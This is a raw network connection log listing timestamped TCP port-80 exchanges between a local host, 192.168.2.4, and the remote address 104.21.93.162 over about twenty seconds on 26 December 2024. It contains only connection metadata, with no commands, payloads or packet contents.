                                                                                                                              Dec 26, 2024 17:17:54.510942936 CET8049779104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:54.510952950 CET8049779104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:54.614887953 CET4978080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:54.734488964 CET8049780104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:54.734509945 CET8049780104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:54.734538078 CET8049780104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:54.913439035 CET8049779104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:54.958442926 CET4977980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:55.445168972 CET8049780104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:55.489713907 CET4978080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:55.698139906 CET8049780104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:55.739695072 CET4978080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:55.813164949 CET4977980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:55.813214064 CET4978080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:55.813846111 CET4978180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:55.928699970 CET4978280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:56.114733934 CET4977980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:56.115302086 CET4978080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:56.381490946 CET8049781104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:56.381542921 CET8049782104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:56.381576061 CET8049779104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:56.381599903 CET4978180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:56.381632090 CET8049780104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:56.381639957 CET4978280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:56.381668091 CET8049779104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:56.381719112 CET4977980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:56.381742001 CET8049780104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:56.381789923 CET4978080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:56.502676964 CET4978180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:56.502757072 CET4978280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:56.622329950 CET8049781104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:56.622471094 CET8049782104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:56.849900961 CET4978280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:56.850047112 CET4978180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:56.969548941 CET8049782104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:56.969614029 CET8049782104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:56.969640970 CET8049781104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:56.969769001 CET8049781104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:56.969783068 CET8049781104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:57.558933020 CET8049782104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:57.559779882 CET8049781104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:57.614700079 CET4978280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:57.614701033 CET4978180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:57.809720993 CET8049782104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:57.814156055 CET8049781104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:57.864707947 CET4978280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:57.864741087 CET4978180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:57.940097094 CET4978180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:57.940211058 CET4978280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:57.940917015 CET4978580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:58.059947968 CET8049781104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:58.060013056 CET4978180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:58.060446024 CET8049785104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:58.060461998 CET8049782104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:58.060519934 CET4978580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:58.060540915 CET4978280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:58.060703039 CET4978580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:58.180386066 CET8049785104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:58.411860943 CET4978580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:58.531563997 CET8049785104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:58.531611919 CET8049785104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:58.531661987 CET8049785104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:58.818692923 CET4978580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:58.819075108 CET4978680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:58.938659906 CET8049786104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:58.938739061 CET4978680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:58.939213037 CET4978680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:58.979437113 CET8049785104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:59.009201050 CET4978780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:59.058751106 CET8049786104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:59.113287926 CET8049785104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:59.114820957 CET4978580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:59.128760099 CET8049787104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:59.131361008 CET4978780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:59.140369892 CET4978780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:59.260056973 CET8049787104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:59.311815023 CET4978680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:59.431384087 CET8049786104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:59.431515932 CET8049786104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:59.614674091 CET4978780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:59.734523058 CET8049787104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:59.734540939 CET8049787104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:59.734555960 CET8049787104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:00.162339926 CET8049786104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:00.208451033 CET4978680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:00.309576035 CET8049787104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:00.351903915 CET4978780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:00.422095060 CET8049786104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:00.474083900 CET4978680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:00.561847925 CET8049787104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:00.614696026 CET4978780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:00.823390961 CET4978680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:00.823587894 CET4978780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:00.826668978 CET4979380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:00.943430901 CET8049786104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:00.943481922 CET4978680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:00.945780993 CET8049787104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:00.945848942 CET4978780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:00.946254015 CET8049793104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:00.946647882 CET4979380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:00.950109959 CET4979380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:01.069645882 CET8049793104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:01.304847956 CET4979380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:01.424885988 CET8049793104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:01.424906015 CET8049793104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:01.424936056 CET8049793104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:01.428519964 CET4979480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:01.428742886 CET4979380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:01.548119068 CET8049794104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:01.551521063 CET4979480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:01.555041075 CET4979480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:01.566036940 CET4979580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:01.595362902 CET8049793104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:01.674567938 CET8049794104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:01.685585976 CET8049795104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:01.687335014 CET4979580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:01.687414885 CET4979580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:01.806994915 CET8049795104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:01.897756100 CET4979480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:01.912244081 CET8049793104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:01.912306070 CET4979380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:02.018106937 CET8049794104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:02.018145084 CET8049794104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:02.059895039 CET4979580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:02.180385113 CET8049795104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:02.180437088 CET8049795104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:02.180469990 CET8049795104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:02.728480101 CET8049794104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:02.857037067 CET4979480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:02.868697882 CET8049795104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:02.911595106 CET4979580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:03.023091078 CET8049794104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:03.144517899 CET8049795104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:03.145966053 CET4979480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:03.192838907 CET4979580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:03.272926092 CET4979480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:03.272941113 CET4979580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:03.273679972 CET4980180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:03.392905951 CET8049794104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:03.393064022 CET4979480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:03.393147945 CET8049801104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:03.393229961 CET4980180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:03.393332958 CET4980180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:03.393407106 CET8049795104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:03.393459082 CET4979580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:03.512742996 CET8049801104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:03.739891052 CET4980180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:03.859723091 CET8049801104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:03.859791040 CET8049801104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:03.859806061 CET8049801104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:04.037597895 CET4980180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:04.037971973 CET4980280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:04.157664061 CET8049802104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:04.157777071 CET4980380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:04.157877922 CET4980280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:04.157877922 CET4980280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:04.199321032 CET8049801104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:04.277487040 CET8049803104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:04.277513981 CET8049802104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:04.277717113 CET4980380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:04.277775049 CET4980380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:04.373378038 CET8049801104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:04.373440981 CET4980180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:04.397346020 CET8049803104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:04.505635023 CET4980280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:04.625194073 CET8049802104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:04.625276089 CET8049802104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:04.641232967 CET4980380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:04.760938883 CET8049803104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:04.760956049 CET8049803104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:04.760972977 CET8049803104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:05.597209930 CET8049802104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:05.646059990 CET4980280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:05.828226089 CET8049803104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:05.853837967 CET8049802104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:05.880388021 CET4980380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:05.895963907 CET4980280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:06.082776070 CET8049803104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:06.130429983 CET4980380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:06.204674959 CET4980280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:06.205472946 CET4980980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:06.205475092 CET4980380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:06.324903965 CET8049802104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:06.325064898 CET4980280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:06.325185061 CET8049809104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:06.325247049 CET4980980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:06.325381041 CET4980980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:06.325484037 CET8049803104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:06.325535059 CET4980380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:06.445070028 CET8049809104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:06.677433014 CET4980980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:06.798048019 CET8049809104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:06.798065901 CET8049809104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:06.798124075 CET8049809104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:06.865695000 CET4980980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:06.865955114 CET4981080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:06.985654116 CET8049810104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:06.985740900 CET4981080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:06.985853910 CET4981080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:06.986083984 CET4981180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:07.027530909 CET8049809104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:07.196484089 CET8049810104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:07.196508884 CET8049811104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:07.196681976 CET4981180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:07.196902990 CET4981180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:07.316523075 CET8049811104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:07.333637953 CET4981080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:07.453332901 CET8049810104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:07.453517914 CET8049810104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:07.508546114 CET8049809104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:07.508658886 CET4980980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:07.552474022 CET4981180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:07.672245026 CET8049811104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:07.672266006 CET8049811104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:07.672281027 CET8049811104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:08.265398026 CET8049810104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:08.317831039 CET4981080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:08.567361116 CET8049810104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:08.583554029 CET8049811104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:08.614711046 CET4981080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:08.630350113 CET4981180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:08.850842953 CET8049811104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:08.895956039 CET4981180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:08.969388008 CET4981080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:08.969441891 CET4981180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:08.970052958 CET4981780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:09.089405060 CET8049810104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:09.089464903 CET4981080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:09.089520931 CET8049817104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:09.089618921 CET4981780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:09.089729071 CET4981780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:09.089879990 CET8049811104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:09.089924097 CET4981180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:09.209171057 CET8049817104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:09.443401098 CET4981780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:09.563136101 CET8049817104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:09.563195944 CET8049817104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:09.563213110 CET8049817104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:09.584671021 CET4981880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:09.704227924 CET8049818104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:09.707345963 CET4981880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:09.707442999 CET4981880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:09.826905012 CET8049818104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:10.052357912 CET4981880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:10.171926022 CET8049818104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:10.172070980 CET8049818104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:10.349991083 CET8049817104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:10.395986080 CET4981780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:10.605757952 CET8049817104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:10.663125038 CET4981780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:10.892121077 CET4981780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:10.895824909 CET4982480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:10.921268940 CET8049818104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:10.974102020 CET4981880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:11.012083054 CET8049817104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:11.012130976 CET4981780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:11.015383005 CET8049824104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:11.015439034 CET4982480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:11.015789032 CET4982480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:11.135262966 CET8049824104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:11.173861027 CET8049818104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:11.224092960 CET4981880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:11.364842892 CET4982480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:11.484545946 CET8049824104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:11.484570980 CET8049824104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:11.484580040 CET8049824104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:12.178330898 CET4981880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:12.179029942 CET4982580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:12.230376005 CET8049824104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:12.271162987 CET4982480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:12.298285961 CET8049818104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:12.298358917 CET4981880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:12.298533916 CET8049825104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:12.298593998 CET4982580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:12.298702002 CET4982580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:12.418140888 CET8049825104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:12.481782913 CET8049824104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:12.536597967 CET4982480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:12.594577074 CET4982480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:12.595268011 CET4983180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:12.647907019 CET4982580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:12.715039015 CET8049824104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:12.715127945 CET4982480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:12.715296984 CET8049831104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:12.715364933 CET4983180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:12.715503931 CET4983180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:12.767527103 CET8049825104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:12.767642975 CET8049825104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:12.836734056 CET8049831104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:13.071080923 CET4983180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:13.190764904 CET8049831104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:13.190807104 CET8049831104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:13.190815926 CET8049831104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:13.477473021 CET8049825104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:13.520989895 CET4982580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:13.733740091 CET8049825104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:13.786621094 CET4982580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:13.894951105 CET8049831104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:13.942866087 CET4983180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:14.145729065 CET8049831104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:14.192879915 CET4983180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:14.267211914 CET4982580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:14.267323971 CET4983180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:14.267975092 CET4983280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:14.387337923 CET8049825104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:14.387475014 CET8049831104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:14.387523890 CET4982580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:14.387540102 CET4983180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:14.387959957 CET8049832104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:14.388025045 CET4983280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:14.388128042 CET4983280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:14.507623911 CET8049832104.21.93.162192.168.2.4
